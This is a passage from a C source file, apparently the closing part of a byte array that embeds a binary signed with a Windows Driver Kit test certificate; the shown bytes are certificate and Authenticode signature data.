0xA8, 0x4E, 0x8C, 0x75, 0x5E, 0xA4, 0xC8, 0x79, 0xEC, 0x2A, 0x91, 841 | 0x4A, 0x23, 0x40, 0x88, 0x23, 0xD2, 0x8C, 0x83, 0xE4, 0x4F, 0xEE, 0xAB, 842 | 0xC9, 0xAC, 0x4E, 0x54, 0x1D, 0xBE, 0xF1, 0x20, 0xB0, 0xFF, 0x27, 0xBC, 843 | 0x19, 0x4C, 0x9B, 0x96, 0xF3, 0x78, 0x5F, 0x86, 0xEA, 0x0E, 0xCE, 0xC2, 844 | 0x22, 0x64, 0x84, 0x61, 0x19, 0xF4, 0x4C, 0x75, 0x6E, 0x44, 0x1B, 0x50, 845 | 0x2C, 0x29, 0xD7, 0xD1, 0xA3, 0xA8, 0x30, 0xD4, 0xA3, 0x67, 0xDE, 0x23, 846 | 0x34, 0x68, 0x7B, 0x40, 0xCB, 0x6C, 0xA0, 0xD4, 0x21, 0xFD, 0x53, 0xD1, 847 | 0xB5, 0xF9, 0x22, 0xBF, 0x62, 0x5F, 0x4B, 0xE3, 0x18, 0x3F, 0xFF, 0x66, 848 | 0x18, 0x3D, 0xD2, 0x25, 0xAA, 0xAF, 0x92, 0xC3, 0xE4, 0xF4, 0x24, 0x78, 849 | 0x6C, 0x76, 0xCE, 0x01, 0x3D, 0x4E, 0x3A, 0xC5, 0x1D, 0xCA, 0x11, 0xCE, 850 | 0x65, 0x40, 0xD3, 0x3E, 0x29, 0xA0, 0x08, 0xEE, 0x24, 0x44, 0xEC, 0x58, 851 | 0x92, 0x5F, 0x01, 0x4E, 0x88, 0x46, 0x4E, 0xF7, 0x87, 0x1B, 0xEA, 0x9C, 852 | 0x5A, 0x14, 0xE3, 0x20, 0x09, 0xC1, 0xA7, 0x26, 0x3A, 0x2D, 0xCE, 0xF1, 853 | 0x71, 0xAC, 0x5E, 0x29, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x24, 0x30, 854 | 0x22, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x04, 0x04, 0x03, 0x02, 855 | 0x04, 0x30, 0x30, 0x13, 0x06, 0x03, 0x55, 0x1D, 0x25, 0x04, 0x0C, 0x30, 856 | 0x0A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x30, 857 | 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 858 | 0x05, 0x00, 0x03, 0x82, 0x01, 0x01, 0x00, 0x48, 0x29, 0x1E, 0xF5, 0x96, 859 | 0x1D, 0x1E, 0x55, 0x8F, 0xDB, 0xAD, 0x78, 0xDC, 0x1A, 0xA7, 0xA4, 0x8C, 860 | 0x98, 0x40, 0xC1, 0x75, 0xD3, 0x49, 0xF7, 0x51, 0x5A, 0x6C, 0x51, 0x1E, 861 | 0x36, 0x40, 0xE8, 0x74, 0x39, 0xE5, 0x2A, 0x17, 0x70, 0x77, 0x61, 0xD6, 862 | 0x5D, 0x3C, 0x2F, 0x7B, 0x02, 0xAC, 0x59, 0x47, 0x39, 0x0A, 0xE6, 0x1C, 863 | 0x5F, 0x35, 0x8D, 0x7C, 0xAA, 0x61, 0xFF, 0x65, 0x0E, 0x92, 0xAA, 0x3F, 864 | 0x5B, 0x0A, 0x9E, 0x29, 0x67, 0x6B, 0xE4, 0x5F, 0xBA, 0xA3, 0xC4, 0xD4, 865 | 0xF6, 0x5F, 0x11, 0xC7, 0x88, 0xCB, 0x73, 0x25, 0xEB, 0x40, 0xF8, 0xDB, 866 | 0x62, 0xCE, 0xEA, 0xD0, 0x7C, 0x94, 0x65, 0x07, 0x0E, 0xC4, 0x08, 0x6C, 867 | 0xBE, 0x12, 0x89, 0xED, 0x97, 0x70, 0x68, 0xFD, 0xED, 0xB0, 0xDF, 0x81, 868 | 0xFB, 0x13, 0xA6, 0xBB, 0x48, 0xF2, 0xCB, 0xBE, 0x26, 0x06, 0x99, 0x53, 869 | 0x92, 0xF1, 0x24, 0x13, 0x90, 0xEB, 0x6A, 0x41, 0x42, 0xDA, 0xA4, 0x55, 870 | 0xA5, 0xC6, 0xCF, 0xC7, 0x91, 0x8C, 0x52, 0xCB, 0xCB, 0x07, 0x88, 0xAB, 871 | 0x6D, 0xAC, 0x41, 0x12, 0x9F, 0x04, 0xEF, 0xC2, 0x67, 0xDF, 0xB7, 0x1C, 872 | 0x6E, 0x09, 0x21, 0xB0, 0x55, 0xA7, 0x78, 0xE6, 0x0E, 0xD1, 0x62, 0x94, 873 | 0x9A, 0x3D, 0x22, 0x79, 0xA3, 0x58, 0x8D, 0x2F, 0xBD, 0x53, 0xFE, 0xD7, 874 | 0xA1, 0x9F, 0x2B, 0x29, 0x3F, 0x30, 0x24, 0x55, 0x5D, 0xB9, 0xBD, 0x02, 875 | 0xA3, 0xDB, 0xC3, 0x53, 0x41, 0x51, 0x87, 0x92, 0xB7, 0x8C, 0x14, 0xEF, 876 | 0x35, 0xFA, 0xA7, 0x6B, 0x1A, 0xAB, 0xD9, 0xD5, 0x6C, 0x1C, 0xDC, 0xEB, 877 | 0xC6, 0xEF, 0x34, 0x47, 0x91, 0xD0, 0x8A, 0x8D, 0x17, 0xE2, 0x1B, 0x67, 878 | 0xCB, 0x88, 0x8C, 0x72, 0xFF, 0x75, 0x27, 0xEB, 0x48, 0xE5, 0x17, 0xEB, 879 | 0xE6, 0x37, 0xDA, 0x34, 0x75, 0x2B, 0xA7, 0xFA, 0xFB, 0x59, 0xF2, 0x31, 880 | 0x82, 0x01, 0xEC, 0x30, 0x82, 0x01, 0xE8, 0x02, 0x01, 0x01, 0x30, 0x43, 881 | 0x30, 0x2F, 0x31, 0x2D, 0x30, 0x2B, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 882 | 0x24, 0x57, 0x44, 0x4B, 0x54, 0x65, 0x73, 0x74, 0x43, 0x65, 0x72, 0x74, 883 | 0x20, 0x53, 0x69, 0x6D, 0x6F, 0x6E, 0x2C, 0x31, 0x33, 0x33, 0x38, 0x39, 884 | 0x36, 0x34, 0x39, 0x34, 0x37, 0x31, 0x36, 0x31, 0x36, 0x35, 0x33, 0x30, 885 | 0x35, 0x02, 0x10, 0x1F, 0x79, 0x6F, 0x37, 0x16, 0xE1, 0xB1, 0xBC, 0x49, 886 | 0xFB, 0xB9, 0xC5, 0xFA, 0xA7, 0xFB, 0xA3, 0x30, 0x0D, 0x06, 0x09, 0x60, 887 | 0x86, 0x48, 0x01, 0x65, 0x03, 0x04, 0x02, 0x01, 0x05, 0x00, 0xA0, 0x7C, 888 | 0x30, 0x10, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 889 | 0x01, 0x0C, 0x31, 0x02, 0x30, 0x00, 0x30, 0x19, 0x06, 0x09, 0x2A, 0x86, 890 | 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x03, 0x31, 0x0C, 0x06, 0x0A, 0x2B, 891 | 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x04, 0x30, 0x1C, 0x06, 892 | 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x0B, 0x31, 893 | 0x0E, 0x30, 0x0C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 894 | 0x02, 0x01, 0x15, 0x30, 0x2F, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 895 | 0x0D, 0x01, 0x09, 0x04, 0x31, 0x22, 0x04, 0x20, 0x63, 0xA4, 0xE4, 0x29, 896 | 0x35, 0x78, 0x3B, 0x4C, 0xAE, 0x65, 0xAE, 0xE7, 0x7C, 0x1F, 0xFD, 0xE0, 897 | 0x06, 0xB4, 0x51, 0xCC, 0xF7, 0x7F, 0x9A, 0xA0, 0xBE, 0x08, 0x51, 0xC9, 898 | 0x01, 0x1E, 0xCE, 0x0A, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 899 | 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x04, 0x82, 0x01, 0x00, 0x8F, 900 | 0x23, 0xDE, 0x23, 0x24, 0xD1, 0x6D, 0xEE, 0xB7, 0xBF, 0x21, 0x03, 0x09, 901 | 0x34, 0x93, 0x57, 0x4E, 0x7E, 0xD4, 0x62, 0xF6, 0x09, 0xD2, 0x60, 0x51, 902 | 0x9A, 0xC2, 0x90, 0xDA, 0x6B, 0xB7, 0x6A, 0xE1, 0xE4, 0x7A, 0x10, 0x3B, 903 | 0x2F, 0x63, 0x93, 0x04, 0x42, 0x56, 0x4E, 0x4D, 0x6B, 0x9F, 0x0A, 0xD0, 904 | 0x4D, 0xF7, 0x82, 0x86, 0x25, 0xC6, 0x02, 0x67, 0xE0, 0x5A, 0xDE, 0xD2, 905 | 0x42, 0x08, 0xD8, 0xDF, 0xA4, 0x8E, 0x70, 0xCC, 0x70, 0x81, 0xC5, 0x2F, 906 | 0x4F, 0xA5, 0x2E, 0x75, 0xBE, 0xEA, 0xD6, 0x30, 0x60, 0x67, 0x58, 0xE2, 907 | 0x4D, 0x44, 0xA1, 0x6A, 0xCC, 0x63, 0xA7, 0xA8, 0xAC, 0x55, 0xD7, 0xA0, 908 | 0x61, 0x8C, 0xE9, 0x9C, 0x4C, 0x8D, 0xB4, 0x30, 0x2C, 0xA8, 0x88, 0x37, 909 | 0x62, 0x46, 0x04, 0x60, 0x19, 0xD9, 0x6C, 0x5C, 0x62, 0x06, 0xD1, 0x37, 910 | 0x33, 0x95, 0xEE, 0x20, 0x0E, 0xBB, 0x88, 0x44, 0xAE, 0xE3, 0xCA, 0x99, 911 | 0x08, 0x72, 0x42, 0x88, 0xC9, 0x6C, 0x00, 0xDB, 0x2C, 0x45, 0x84, 0x20, 912 | 0xFC, 0x40, 0xF5, 0xEE, 0xB8, 0x71, 0x26, 0xE8, 0x52, 0xE1, 0x29, 0xDC, 913 | 0x64, 0xA7, 0xC1, 0xF0, 0xB0, 0xD6, 0x32, 0x6B, 0x00, 0x77, 0xCF, 0xE2, 914 | 0x4D, 0x10, 0xE1, 0xE9, 0x98, 0xCF, 0xE6, 0xEC, 0x24, 0x61, 0x00, 0x70, 915 | 0x7E, 0x9F, 0x72, 0x9B, 0x95, 0xC9, 0xDA, 0xF4, 0x92, 0x79, 0x25, 0xAC, 916 | 0x3C, 0x99, 0x2F, 0x62, 0x97, 0xB4, 0xA0, 0x09, 0xE7, 0xC3, 0xD2, 0xFF, 917 | 0xC5, 0x2F, 0xFB, 0x4D, 0xA6, 0xC1, 0xB4, 0xD0, 0x86, 0xAE, 0xA2, 0x2D, 918 | 0xDD, 0x17, 0xFB, 0xD2, 0x16, 0x46, 0xEA, 0x6F, 0xB1, 0xDC, 0x4E, 0xEF, 919 | 0x06, 0x05, 0xD6, 0x94, 0xF3, 0x5F, 0xC4, 0x8D, 0xAF, 0xB7, 0xAE, 0x86, 920 | 0xD5, 0x13, 0xCD, 0xB6, 0x3C, 0x40, 0xA9, 0x5F, 0x31, 0xD1, 0x1A, 0xA2, 921 | 0x56, 0x23, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00 922 | }; 923 | --------------------------------------------------------------------------------